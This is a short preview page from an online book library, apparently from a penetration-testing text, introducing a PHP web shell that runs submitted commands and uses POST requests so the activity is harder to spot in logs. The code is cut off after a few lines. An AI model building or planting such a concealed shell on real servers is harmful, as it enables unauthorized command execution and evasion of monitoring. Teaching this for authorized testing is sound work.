Free Trial

Safari Books Online is a digital library providing on-demand subscription access to thousands of learning resources.

Share this Page URL

Chapter 5 - Introduction to Web scriptin... > Putting It All Together - Pg. 156

156 CHAPTER 5 Introduction to Web scripting with PHP FIGURE 5.10 Output from exectest.php PUTTING IT ALL TOGETHER Having a basic PHP shell at our disposal will be very useful for penetration tests where we either have the ability to run code on the Web server or have the ability to include our own PHP. To try out the skills we have just learned, we are going to build a basic PHP shell. We will be looking at command execution, form handling, conditionals, and more. We don't want anyone to notice what we're doing with our script, so to make it a little bit harder to detect by simple log watching, we are going to be submitting our information via POST requests. We want to be able to submit shell commands to our script and see the output. To be helpful, it would also be nice if we kept track of our previous output so that we could do some basic scroll-back. Let's build our simple PHP shell. <?php if($_POST['command']) { if($_POST['out']) { $out = $_POST['out'] . "\n"; if(strlen($out) > 2000)